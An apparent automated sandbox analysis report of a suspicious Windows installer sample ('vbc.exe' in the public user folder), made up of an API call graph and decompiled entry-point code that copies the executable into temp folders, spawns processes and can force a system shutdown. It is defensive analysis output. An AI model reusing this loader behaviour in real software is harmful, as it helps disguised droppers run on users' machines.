GetWindowsDirectoryA lstrcatA 3183->3187 3184 4055a3 CharNextA 3184->3185 3185->3180 3185->3184 3191 403348 3185->3191 3254 402c5b GetTickCount GetModuleFileNameA 3186->3254 3189 4031f1 11 API calls 3187->3189 3192 40338f 3189->3192 3190 4033a4 3193 403411 ExitProcess OleUninitialize 3190->3193 3199 4055a3 CharNextA 3190->3199 3228 4033fd 3190->3228 3338 405a85 lstrcpynA 3191->3338 3192->3186 3192->3193 3195 403426 3193->3195 3196 40350b 3193->3196 3200 405346 MessageBoxIndirectA 3195->3200 3197 40358e ExitProcess 3196->3197 3201 405da3 3 API calls 3196->3201 3204 4033bb 3199->3204 3205 403434 ExitProcess 3200->3205 3206 40351a 3201->3206 3209 4033d8 3204->3209 3210 40343c lstrcatA lstrcmpiA 3204->3210 3207 405da3 3 API calls 3206->3207 3208 403523 3207->3208 3211 405da3 3 API calls 3208->3211 3339 405659 3209->3339 3210->3193 3212 403458 CreateDirectoryA SetCurrentDirectoryA 3210->3212 3216 40352c 3211->3216 3214 40347a 3212->3214 3215 40346f 3212->3215 3356 405a85 lstrcpynA 3214->3356 3355 405a85 lstrcpynA 3215->3355 3217 40357a ExitWindowsEx 3216->3217 3224 40353a GetCurrentProcess 3216->3224 3217->3197 3221 403587 3217->3221 3223 40140b 2 API calls 3221->3223 3223->3197 3230 40354a 3224->3230 3225 4033f2 3354 405a85 lstrcpynA 3225->3354 3227 405aa7 18 API calls 3229 4034aa DeleteFileA 3227->3229 3284 4035e3 3228->3284 3231 4034b7 CopyFileA 3229->3231 3237 403488 3229->3237 3230->3217 3231->3237 3232 4034ff 3234 4057d3 38 API calls 3232->3234 3235 403506 3234->3235 3235->3193 3236 405aa7 18 API calls 3236->3237 3237->3227 3237->3232 3237->3236 3239 4034eb CloseHandle 3237->3239 3357 4057d3 3237->3357 3383 4052e5 CreateProcessA 3237->3383 3239->3237 3241 405dca GetProcAddress 3240->3241 3242 405dbf LoadLibraryA 3240->3242 3243 403268 SHGetFileInfoA 3241->3243 3242->3241 3242->3243 3244 405a85 lstrcpynA 3243->3244 3244->3174 3245->3176 3247 405ce3 5 API calls 3246->3247 3249 4031fd 3247->3249 3248 403207 3248->3183 3249->3248 3250 405578 3 API calls 3249->3250 3251 40320f CreateDirectoryA 3250->3251 3252 40578b 2 API calls 3251->3252 3253 403223 3252->3253 3253->3183 3386 40575c GetFileAttributesA CreateFileA 3254->3386 3256 402c9e 3283 402cab 3256->3283 3387 405a85 lstrcpynA 3256->3387 3258 402cc1 3388 4055bf lstrlenA 3258->3388 3262 402cd2 GetFileSize 3263 402dd3 3262->3263 3264 402ce9 3262->3264 3265 402bc5 32 API calls 3263->3265 3264->3263 3266 4031a8 ReadFile 3264->3266 3269 402e6e 3264->3269 3275 402bc5 32 API calls 3264->3275 3264->3283 3267 402dda 3265->3267 3266->3264 3268 402e16 GlobalAlloc 3267->3268 3267->3283 3393 4031da SetFilePointer 3267->3393 3271 402e2d 3268->3271 3272 402bc5 32 API calls 3269->3272 3276 40578b 2 API calls 3271->3276 3272->3283 3273 402df7 3274 4031a8 ReadFile 3273->3274 3277 402e02 3274->3277 3275->3264 3278 402e3e CreateFileA 3276->3278 3277->3268 3277->3283 3279 402e78 3278->3279 3278->3283 3394 4031da SetFilePointer 3279->3394 3281 402e86 3282 402f01 47 API calls 3281->3282 3282->3283 3283->3190 3285 405da3 3 API calls 3284->3285 3286 4035f7 3285->3286 3287 4035fd 3286->3287 3288 40360f 3286->3288 3404 4059e3 wsprintfA 3287->3404 3289 40596c 3 API calls 3288->3289 3290 403630 3289->3290 3292 40364e lstrcatA 3290->3292 3294 40596c 3 API calls 3290->3294 3293 40360d 3292->3293 3395 403897 3293->3395 3294->3292 3297 405659 18 API calls 3298 403676 3297->3298 3299 4036ff 3298->3299 3301 40596c 3 API calls 3298->3301 3300 405659 18 API calls 3299->3300 3302 403705 3300->3302 3303 4036a2 3301->3303 3304 403715 LoadImageA 3302->3304 3305 405aa7 18 API calls 3302->3305 3303->3299 3309 4036be lstrlenA 3303->3309 3312 4055a3 CharNextA 3303->3312 3306 403740 RegisterClassA 3304->3306 3307 4037c9 3304->3307 3305->3304 3310 40377c SystemParametersInfoA CreateWindowExA 3306->3310 3337 40340d 3306->3337 3308 40140b 2 API calls 3307->3308 3311 4037cf 3308->3311 3313 4036f2 3309->3313 3314 4036cc lstrcmpiA 3309->3314 3310->3307 3319 403897 19 API calls 3311->3319 3311->3337 3317 4036bc 3312->3317 3316 405578 3 API calls 3313->3316 3314->3313 3315 4036dc GetFileAttributesA 3314->3315 3318 4036e8 3315->3318 3320 4036f8 3316->3320 3317->3309 3318->3313 3321 4055bf 2 API calls 3318->3321 3322 4037e0 3319->3322 3405 405a85 lstrcpynA 3320->3405 3321->3313 3324 403864 3322->3324 3325 4037e8 ShowWindow LoadLibraryA 3322->3325 3406 404ef5 OleInitialize 3324->3406 3326 403807 LoadLibraryA 3325->3326 3327 40380e GetClassInfoA 3325->3327 3326->3327 3330 403822 GetClassInfoA RegisterClassA 3327->3330 3331 403838 DialogBoxParamA 3327->3331 3329 40386a 3332 403886 3329->3332 3333 40386e 3329->3333 3330->3331 3334 40140b 2 API calls 3331->3334 3335 40140b 2 API calls 3332->3335 3336 40140b 2 API calls 3333->3336 3333->3337 3334->3337 3335->3337 3336->3337 3337->3193 3338->3181 3414 405a85 lstrcpynA 3339->3414 3341 40566a 3342 40560c 4 API calls 3341->3342 3343 405670 3342->3343 3344 4033e3 3343->3344 3345 405ce3 5 API calls 3343->3345 3344->3193 3353 405a85 lstrcpynA 3344->3353 3351 405680 3345->3351 3346 4056ab lstrlenA 3347 4056b6 3346->3347 3346->3351 3349 405578 3 API calls 3347->3349 3348 405d7c 2 API calls 3348->3351 3350 4056bb GetFileAttributesA 3349->3350 3350->3344 3351->3344 3351->3346 3351->3348 3352 4055bf 2 API calls 3351->3352 3352->3346 3353->3225 3354->3228 3355->3214 3356->3237 3358 405da3 3 API calls 3357->3358 3359 4057de 3358->3359 3360 40583b GetShortPathNameA 3359->3360 3362 405930 3359->3362 3415 40575c GetFileAttributesA CreateFileA 3359->3415 3361 405850 3360->3361 3360->3362 3361->3362 3364 405858 wsprintfA 3361->3364 3362->3237 3366 405aa7 18 API calls 3364->3366 3365 40581f CloseHandle GetShortPathNameA 3365->3362 3367 405833 3365->3367 3368 405880 3366->3368 3367->3360 3367->3362 3416 40575c GetFileAttributesA CreateFileA 3368->3416 3370 40588d 3370->3362 3371 40589c GetFileSize GlobalAlloc 3370->3371 3372 405929 CloseHandle 3371->3372 3373 4058ba ReadFile 3371->3373 3372->3362 3373->3372 3374 4058ce 3373->3374 3374->3372 3417 4056d1 lstrlenA 3374->3417 3377 4058e3 3422 405a85 lstrcpynA 3377->3422 3378 40593d 3379 4056d1 4 API calls 3378->3379 3381 4058f1 3379->3381 3382 405904 SetFilePointer WriteFile GlobalFree 3381->3382 3382->3372 3384 405320 3383->3384 3385 405314 CloseHandle 3383->3385 3384->3237 3385->3384 3386->3256 3387->3258 3389 4055cc 3388->3389 3390 4055d1 CharPrevA 3389->3390 3391 402cc7 3389->3391 3390->3389 3390->3391 3392 405a85 lstrcpynA 3391->3392 3392->3262 3393->3273 3394->3281 3396 4038ab 3395->3396 3413 4059e3 wsprintfA 3396->3413 3398 40391c 3399 405aa7 18 API calls 3398->3399 3400 403928 SetWindowTextA 3399->3400 3401 403944 3400->3401 3402 40365e 3400->3402 3401->3402 3403 405aa7 18 API calls 3401->3403 3402->3297 3403->3401 3404->3293 3405->3299 3407 403e83 SendMessageA 3406->3407 3409 404f18 3407->3409 3408 403e83 SendMessageA 3410 404f51 OleUninitialize 3408->3410 3411 401389 2 API calls 3409->3411 3412 404f3f 3409->3412 3410->3329 3411->3409 3412->3408 3413->3398 3414->3341 3415->3365 3416->3370 3418 405707 lstrlenA 3417->3418 3419 405711 3418->3419 3420 4056e5 lstrcmpiA 3418->3420 3419->3377 3419->3378 3420->3419 3421 4056fe CharNextA 3420->3421 3421->3418 3422->3381 4172 401ca5 4173 4029cb 18 API calls 4172->4173 4174 401cb5 SetWindowLongA 4173->4174 4175 40287d 4174->4175 3423 4035a6 3424 4035c1 3423->3424 3425 4035b7 CloseHandle 3423->3425 3426 4035d5 3424->3426 3427 4035cb CloseHandle 3424->3427 3425->3424 3430 4053aa 3426->3430 3427->3426 3431 405659 18 API calls 3430->3431 3432 4053be 3431->3432 3433 4053c7 DeleteFileA 3432->3433 3434 4053de 3432->3434 3435 4035e1 3433->3435 3436 405513 3434->3436 3472 405a85 lstrcpynA 3434->3472 3436->3435 3443 405d7c 2 API calls 3436->3443 3438 405408 3439 405419 3438->3439 3440 40540c lstrcatA 3438->3440 3442 4055bf 2 API calls 3439->3442 3441 40541f 3440->3441 3444 40542d lstrcatA 3441->3444 3446 405438 lstrlenA FindFirstFileA 3441->3446 3442->3441 3445 405538 3443->3445 3444->3446 3445->3435 3447 405578 3 API calls 3445->3447 3446->3436 3452 40545c 3446->3452 3449 405542 3447->3449 3448 4055a3 CharNextA 3448->3452 3450 40573d 2 API calls 3449->3450 3451 405548 RemoveDirectoryA 3450->3451 3453 405553 3451->3453 3454 40556a 3451->3454 3452->3448 3458 4054f2 FindNextFileA 3452->3458 3461 4054b9 3452->3461 3465 4053aa 59 API calls 3452->3465 3473 405a85 lstrcpynA 3452->3473 3453->3435 3456 405559 3453->3456 3457 404e23 25 API calls 3454->3457 3459 404e23 25 API calls 3456->3459 3457->3435 3458->3452 3460 40550a FindClose 3458->3460 3462 405561 3459->3462 3460->3436 3464 40573d 2 API calls 3461->3464 3463 4057d3 38 API calls 3462->3463 3466 405568 3463->3466 3467 4054bf DeleteFileA 3464->3467 3465->3452 3466->3435 3468 4054ca 3467->3468 3468->3458 3469 404e23 25 API calls 3468->3469 3470 404e23 25 API calls 3468->3470 3471 4057d3 38 API calls 3468->3471 3469->3458 3470->3468 3471->3468 3472->3438 3473->3452 4176 401a26 4177 4029cb 18 API calls 4176->4177 4178 401a2c 4177->4178 4179 4029cb 18 API calls 4178->4179 4180 4019d6 4179->4180 4181 4045aa 4182 4045d6 4181->4182 4183 4045ba 4181->4183 4184 404609 4182->4184 4185 4045dc SHGetPathFromIDListA 4182->4185 4192 40532a GetDlgItemTextA 4183->4192 4187 4045ec 4185->4187 4191 4045f3 SendMessageA 4185->4191 4189 40140b 2 API calls 4187->4189 4188 4045c7 SendMessageA 4188->4182 4189->4191 4191->4184 4192->4188 4193 402b2d 4194 402b55 4193->4194 4195 402b3c SetTimer 4193->4195 4196 402ba3 4194->4196 4197 402ba9 MulDiv 4194->4197 4195->4194 4198 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4197->4198 4198->4196 4200 401bad 4201 4029cb 18 API calls 4200->4201 4202 401bb4 4201->4202 4203 4029cb 18 API calls 4202->4203 4204 401bbe 4203->4204 4205 4029e8 18 API calls 4204->4205 4209 401bce 4204->4209 4205->4209 4206 4029e8 18 API calls 4210 401bde 4206->4210 4207 401be9 4211 4029cb 18 API calls 4207->4211 4208 401c2d 4212 4029e8 18 API calls 4208->4212 4209->4206 4209->4210 4210->4207 4210->4208 4213 401bee 4211->4213 4214 401c32 4212->4214 4215 4029cb 18 API calls 4213->4215 4216 4029e8 18 API calls 4214->4216 4218 401bf7 4215->4218 4217 401c3b FindWindowExA 4216->4217 4221 401c59 4217->4221 4219 401c1d SendMessageA 4218->4219 4220 401bff SendMessageTimeoutA 4218->4220 4219->4221 4220->4221 4222 40422e 4223 404264 4222->4223 4224 40423e 4222->4224 4226 403e9e 8 API calls 4223->4226 4225 403e37 19 API calls 4224->4225 4227 40424b SetDlgItemTextA 4225->4227 4228 404270 4226->4228 4227->4223 4229 402630 4230 4029e8 18 API calls 4229->4230 4231 402637 FindFirstFileA 4230->4231 4232 40265a 4231->4232 4233 40264a 4231->4233 4234 402661 4232->4234 4237 4059e3 wsprintfA 4232->4237 4238 405a85 lstrcpynA 4234->4238 4237->4234 4238->4233 4246 4024b0 4247 4024b5 4246->4247 4248 4024c6 4246->4248 4249 4029cb 18 API calls 4247->4249 4250 4029e8 18 API calls 4248->4250 4252 4024bc 4249->4252 4251 4024cd lstrlenA 4250->4251 4251->4252 4253 4024ec WriteFile 4252->4253 4254 40264e 4252->4254 4253->4254 2911 4015b3 2912 4029e8 18 API calls 2911->2912 2913 4015ba 2912->2913 2929 40560c CharNextA CharNextA 2913->2929 2915 40160a 2916 40162d 2915->2916 2917 40160f 2915->2917 2923 401423 25 API calls 2916->2923 2935 401423 2917->2935 2918 4055a3 CharNextA 2920 4015d0 CreateDirectoryA 2918->2920 2922 4015e5 GetLastError 2920->2922 2926 4015c2 2920->2926 2925 4015f2 GetFileAttributesA 2922->2925 2922->2926 2927 40215b 2923->2927 2925->2926 2926->2915 2926->2918 2928 401621 SetCurrentDirectoryA 2928->2927 2930 405626 2929->2930 2934 405632 2929->2934 2931 40562d CharNextA 2930->2931 2930->2934 2932 40564f 2931->2932 2932->2926 2933 4055a3 CharNextA 2933->2934 2934->2932 2934->2933 2939 404e23 2935->2939 2938 405a85 lstrcpynA 2938->2928 2940 404e3e 2939->2940 2948 401431 2939->2948 2941 404e5b lstrlenA 2940->2941 2942 405aa7 18 API calls 2940->2942 2943 404e84 2941->2943 2944 404e69 lstrlenA 2941->2944 2942->2941 2945 404e97 2943->2945 2946 404e8a SetWindowTextA 2943->2946 2947 404e7b lstrcatA 2944->2947 2944->2948 2945->2948 2949 404e9d SendMessageA SendMessageA SendMessageA 2945->2949 2946->2945 2947->2943 2948->2938 2949->2948 3056 401734 3057 4029e8 18 API calls 3056->3057 3058 40173b 3057->3058 3059 401761 3058->3059 3060 401759 3058->3060 3111 405a85 lstrcpynA 3059->3111 3110 405a85 lstrcpynA 3060->3110 3063 40175f 3067 405ce3 5 API calls 3063->3067 3064 40176c 3112 405578 lstrlenA CharPrevA 3064->3112 3087 40177e 3067->3087 3071 401795 CompareFileTime 3071->3087 3072 401859 3074 404e23 25 API calls 3072->3074 3073 401830 3075 404e23 25 API calls 3073->3075 3083 401845 3073->3083 3077 401863 3074->3077 3075->3083 3076 405a85 lstrcpynA 3076->3087 3095 402f01 3077->3095 3080 40188a SetFileTime 3081 40189c CloseHandle 3080->3081 3081->3083 3084 4018ad 3081->3084 3082 405aa7 18 API calls 3082->3087 3085 4018b2 3084->3085 3086 4018c5 3084->3086 3088 405aa7 18 API calls 3085->3088 3089 405aa7 18 API calls 3086->3089 3087->3071 3087->3072 3087->3073 3087->3076 3087->3082 3094 40575c GetFileAttributesA CreateFileA 3087->3094 3115 405d7c FindFirstFileA 3087->3115 3118 40573d GetFileAttributesA 3087->3118 3121 405346 3087->3121 3091 4018ba lstrcatA 3088->3091 3092 4018cd 3089->3092 3091->3092 3093 405346 MessageBoxIndirectA 3092->3093 3093->3083 3094->3087 3096 402f12 SetFilePointer 3095->3096 3097 402f2e 3095->3097 3096->3097 3125 40302c GetTickCount 3097->3125 3100 402f3f ReadFile 3101 402f5f 3100->3101 3106 401876 3100->3106 3102 40302c 42 API calls 3101->3102 3101->3106 3103 402f76 3102->3103 3104 402ff1 ReadFile 3103->3104 3103->3106 3108 402f86 3103->3108 3104->3106 3106->3080 3106->3081 3107 402fa1 ReadFile 3107->3106 3107->3108 3108->3106 3108->3107 3109 402fba WriteFile 3108->3109 3109->3106 3109->3108 3110->3063 3111->3064 3113 405592 lstrcatA 3112->3113 3114 401772 lstrcatA 3112->3114 3113->3114 3114->3063 3116 405d92 FindClose 3115->3116 3117 405d9d 3115->3117 3116->3117 3117->3087 3119 405759 3118->3119 3120 40574c SetFileAttributesA 3118->3120 3119->3087 3120->3119 3122 40535b 3121->3122 3123 4053a7 3122->3123 3124 40536f MessageBoxIndirectA 3122->3124 3123->3087 3124->3123 3126 403196 3125->3126 3127 40305b 3125->3127 3128 402bc5 32 API calls 3126->3128 3138 4031da SetFilePointer 3127->3138 3134 402f37 3128->3134 3130 403066 SetFilePointer 3135 40308b 3130->3135 3134->3100 3134->3106 3135->3134 3136 403120 WriteFile 3135->3136 3137 403177 SetFilePointer 3135->3137 3139 4031a8 ReadFile 3135->3139 3141 405e9d 3135->3141 3148 402bc5 3135->3148 3136->3134 3136->3135 3137->3126 3138->3130 3140 4031c9 3139->3140 3140->3135 3142 405ec2 3141->3142 3143 405eca 3141->3143 3142->3135 3143->3142 3144 405f51 GlobalFree 3143->3144 3145 405f5a GlobalAlloc 3143->3145 3146 405fd1 GlobalAlloc 3143->3146 3147 405fc8 GlobalFree 3143->3147 3144->3145 3145->3142 3145->3143 3146->3142 3146->3143 3147->3146 3149 402bd3 3148->3149 3150 402beb 3148->3150 3151 402bdc DestroyWindow 3149->3151 3158 402be3 3149->3158 3152 402bf3 3150->3152 3153 402bfb GetTickCount 3150->3153 3151->3158 3163 405ddc 3152->3163 3154 402c09 3153->3154 3153->3158 3156 402c11 3154->3156 3157 402c3e CreateDialogParamA 3154->3157 3156->3158 3167 402ba9 3156->3167 3157->3158 3158->3135 3160 402c1f wsprintfA 3161 404e23 25 API calls 3160->3161 3162 402c3c 3161->3162 3162->3158 3164 405df9 PeekMessageA 3163->3164 3165 405e09 3164->3165 3166 405def DispatchMessageA 3164->3166 3165->3158 3166->3164 3168 402bb8 3167->3168 3169 402bba MulDiv 3167->3169 3168->3169 3169->3160 4255 401634 4256 4029e8 18 API calls 4255->4256 4257 40163a 4256->4257 4258 405d7c 2 API calls 4257->4258 4259 401640 4258->4259 4260 401934 4261 4029cb 18 API calls 4260->4261 4262 40193b 4261->4262 4263 4029cb 18 API calls 4262->4263 4264 401945 4263->4264 4265 4029e8 18 API calls 4264->4265 4266 40194e 4265->4266 4267 401961 lstrlenA 4266->4267 4269 40199c 4266->4269 4268 40196b 4267->4268 4268->4269 4273 405a85 lstrcpynA 4268->4273 4271 401985 4271->4269 4272 401992 lstrlenA 4271->4272 4272->4269 4273->4271 4274 4019b5 4275 4029e8 18 API calls 4274->4275 4276 4019bc 4275->4276 4277 4029e8 18 API calls 4276->4277 4278 4019c5 4277->4278 4279 4019cc lstrcmpiA 4278->4279 4280 4019de lstrcmpA 4278->4280 4281 4019d2 4279->4281 4280->4281 4282 4014b7 4283 4014bd 4282->4283 4284 401389 2 API calls 4283->4284 4285 4014c5 4284->4285 4286 4025be 4287 4025c5 4286->4287 4289 40282a 4286->4289 4288 4029cb 18 API calls 4287->4288 4290 4025d0 4288->4290 4291 4025d7 SetFilePointer 4290->4291 4291->4289 4292 4025e7 4291->4292 4294 4059e3 wsprintfA 4292->4294 4294->4289

                          Executed Functions

                          Function 00403225 Relevance: 73.8, APIs: 24, Strings: 18, Instructions: 270filestringcomCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 403225-4032ba #17 SetErrorMode OleInitialize call 405da3 SHGetFileInfoA call 405a85 GetCommandLineA call 405a85 GetModuleHandleA 7 4032c6-4032db call 4055a3 CharNextA 0->7 8 4032bc-4032c1 0->8 11 403340-403344 7->11 8->7 12 403346 11->12 13 4032dd-4032e0 11->13 16 403359-403371 GetTempPathA call 4031f1 12->16 14 4032e2-4032e6 13->14 15 4032e8-4032f0 13->15 14->14 14->15 17 4032f2-4032f3 15->17 18 4032f8-4032fb 15->18 26 403393-4033aa DeleteFileA call 402c5b 16->26 27 403373-403391 GetWindowsDirectoryA lstrcatA call 4031f1 16->27 17->18 20 403330-40333d call 4055a3 18->20 21 4032fd-403301 18->21 20->11 36 40333f 20->36 24 403311-403317 21->24 25 403303-40330c 21->25 32 403327-40332e 24->32 33 403319-403322 24->33 25->24 30 40330e 25->30 39 403411-403420 ExitProcess OleUninitialize 26->39 40 4033ac-4033b2 26->40 27->26 27->39 30->24 32->20 35 403348-403354 call 405a85 32->35 33->32 38 403324 33->38 35->16 36->11 38->32 44 403426-403436 call 405346 ExitProcess 39->44 45 40350b-403511 39->45 42 403401-403408 call 4035e3 40->42 43 4033b4-4033bd call 4055a3 40->43 52 40340d 42->52 58 4033c8-4033ca 43->58 46 403513-403530 call 405da3 * 3 45->46 47 40358e-403596 45->47 73 403532-403534 46->73 74 40357a-403585 ExitWindowsEx 46->74 53 403598 47->53 54 40359c-4035a0 ExitProcess 47->54 52->39 53->54 60 4033cc-4033d6 58->60 61 4033bf-4033c5 58->61 64 4033d8-4033e5 call 405659 60->64 65 40343c-403456 lstrcatA lstrcmpiA 60->65 61->60 63 4033c7 61->63 63->58 64->39 76 4033e7-4033fd call 405a85 * 2 64->76 65->39 67 403458-40346d CreateDirectoryA SetCurrentDirectoryA 65->67 70 40347a-403494 call 405a85 67->70 71 40346f-403475 call 405a85 67->71 82 403499-4034b5 call 405aa7 DeleteFileA 70->82 71->70 73->74 79 403536-403538 73->79 74->47 78 403587-403589 call 40140b 74->78 76->42 78->47 79->74 84 40353a-40354c GetCurrentProcess 79->84 91 4034f6-4034fd 82->91 92 4034b7-4034c7 CopyFileA 82->92 84->74 93 40354e-403570 84->93 91->82 95 4034ff-403506 call 4057d3 91->95 92->91 94 4034c9-4034e9 call 4057d3 call 405aa7 call 4052e5 92->94 93->74 94->91 105 4034eb-4034f2 CloseHandle 94->105 95->39 105->91
                          C-Code - Quality: 81%
                          			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v392;
				int _v396;
				int _v400;
				signed int _v404;
				CHAR* _v408;
				int _v412;
				struct _SECURITY_ATTRIBUTES* _v416;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				int _t50;
				signed int _t51;
				signed int _t54;
				int _t55;
				signed int _t59;
				intOrPtr _t70;
				intOrPtr _t76;
				void* _t78;
				void* _t88;
				void* _t90;
				char* _t95;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t99;
				signed int _t102;
				CHAR* _t104;
				signed int _t105;
				intOrPtr _t112;
				char _t119;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t98 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405DA3(8);
				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
				E00405A85("fwwmjbqpxzax Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t95 = "\"C:\\Users\\Public\\vbc.exe\" ";
				E00405A85(_t95, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t95;
				if("\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004055A3(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t90 =  *_t44;
					_t108 = _t90;
					if(_t90 == 0) {
						break;
					}
					__eflags = _t90 - 0x20;
					if(_t90 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004055A3(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t98 = _t98 | 0x00000002;
									__eflags = _t98;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t98 = _t98 | 0x00000004;
									__eflags = _t98;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E00405A85("C:\\Users\\Albus\\AppData\\Local\\Temp", _t45);
								L20:
								_t104 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t104);
								_t48 = E004031F1(_t108);
								_t109 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C5B(_t110, _t98); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										if(_v404 == 0) {
											__eflags =  *0x423f34; // 0x0
											if(__eflags != 0) {
												_t105 = E00405DA3(3);
												_t99 = E00405DA3(4);
												_t54 = E00405DA3(5);
												__eflags = _t105;
												_t96 = _t54;
												if(_t105 != 0) {
													__eflags = _t99;
													if(_t99 != 0) {
														__eflags = _t96;
														if(_t96 != 0) {
															_t59 =  *_t105(GetCurrentProcess(), 0x28,  &_v392);
															__eflags = _t59;
															if(_t59 != 0) {
																 *_t99(0, "SeShutdownPrivilege",  &_v396);
																_v412 = 1;
																_v400 = 2;
																 *_t96(_v416, 0,  &_v412, 0, 0, 0);
															}
														}
													}
												}
												_t55 = ExitWindowsEx(2, 0);
												__eflags = _t55;
												if(_t55 == 0) {
													E0040140B(9);
												}
											}
											_t51 =  *0x423f4c; // 0xffffffff
											__eflags = _t51 - 0xffffffff;
											if(_t51 != 0xffffffff) {
												_v396 = _t51;
											}
											ExitProcess(_v396);
										}
										E00405346(_v404, 0x200010);
										ExitProcess(2);
									}
									_t112 =  *0x423ebc; // 0x0
									if(_t112 == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004035E3();
										goto L32;
									}
									_t102 = E004055A3(_t95, 0);
									while(_t102 >= _t95) {
										__eflags =  *_t102 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t102 = _t102 - 1;
										__eflags = _t102;
									}
									_t114 = _t102 - _t95;
									_v408 = "Error launching installer";
									if(_t102 < _t95) {
										lstrcatA(_t104, "~nsu.tmp");
										_t100 = "C:\\Users\\Public";
										if(lstrcmpiA(_t104, "C:\\Users\\Public") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t104, 0);
										SetCurrentDirectoryA(_t104);
										_t119 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
										if(_t119 == 0) {
											E00405A85("C:\\Users\\Albus\\AppData\\Local\\Temp", _t100);
										}
										E00405A85(0x424000, _v396);
										 *0x424400 = 0x41;
										_t97 = 0x1a;
										do {
											_t70 =  *0x423eb0; // 0x8c0fa0
											E00405AA7(0, _t97, 0x41f050, 0x41f050,  *((intOrPtr*)(_t70 + 0x120)));
											DeleteFileA(0x41f050);
											if(_v416 != 0 && CopyFileA("C:\\Users\\Public\\vbc.exe", 0x41f050, 1) != 0) {
												_push(0);
												_push(0x41f050);
												E004057D3();
												_t76 =  *0x423eb0; // 0x8c0fa0
												E00405AA7(0, _t97, 0x41f050, 0x41f050,  *((intOrPtr*)(_t76 + 0x124)));
												_t78 = E004052E5(0x41f050);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t97 = _t97 - 1;
										} while (_t97 != 0);
										_push(0);
										_push(_t104);
										E004057D3();
										goto L32;
									}
									 *_t102 = 0;
									_t103 = _t102 + 4;
									if(E00405659(_t114, _t102 + 4) == 0) {
										goto L32;
									}
									E00405A85("C:\\Users\\Albus\\AppData\\Local\\Temp", _t103);
									E00405A85("C:\\Users\\Albus\\AppData\\Local\\Temp", _t103);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t104, 0x3fb);
								lstrcatA(_t104, "\\Temp");
								_t88 = E004031F1(_t109);
								_t110 = _t88;
								if(_t88 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}









































                          0x00403231
                          0x00403235
                          0x0040323d
                          0x0040323f
                          0x00403244
                          0x0040324f
                          0x00403256
                          0x0040325e
                          0x00403268
                          0x0040327e
                          0x0040328e
                          0x00403293
                          0x00403299
                          0x004032a0
                          0x004032b3
                          0x004032b8
                          0x004032ba
                          0x004032bc
                          0x004032c1
                          0x004032c1
                          0x004032d1
                          0x004032d7
                          0x00403340
                          0x00403340
                          0x00403342
                          0x00403344
                          0x00000000
                          0x00000000
                          0x004032dd
                          0x004032e0
                          0x004032e8
                          0x004032e8
                          0x004032eb
                          0x004032f0
                          0x004032f2
                          0x004032f2
                          0x004032f3
                          0x004032f3
                          0x004032f8
                          0x004032fb
                          0x00403330
                          0x00403335
                          0x0040333a
                          0x0040333d
                          0x0040333f
                          0x0040333f
                          0x0040333f
                          0x00000000
                          0x004032fd
                          0x004032fd
                          0x004032fe
                          0x00403301
                          0x00403309
                          0x0040330c
                          0x0040330e
                          0x0040330e
                          0x0040330e
                          0x0040330c
                          0x00403311
                          0x00403317
                          0x0040331f
                          0x00403322
                          0x00403324
                          0x00403324
                          0x00403324
                          0x00403322
                          0x00403327
                          0x0040332e
                          0x00403348
                          0x0040334b
                          0x0040334b
                          0x00403354
                          0x00403359
                          0x00403359
                          0x00403364
                          0x0040336a
                          0x0040336f
                          0x00403371
                          0x00403393
                          0x00403398
                          0x0040339f
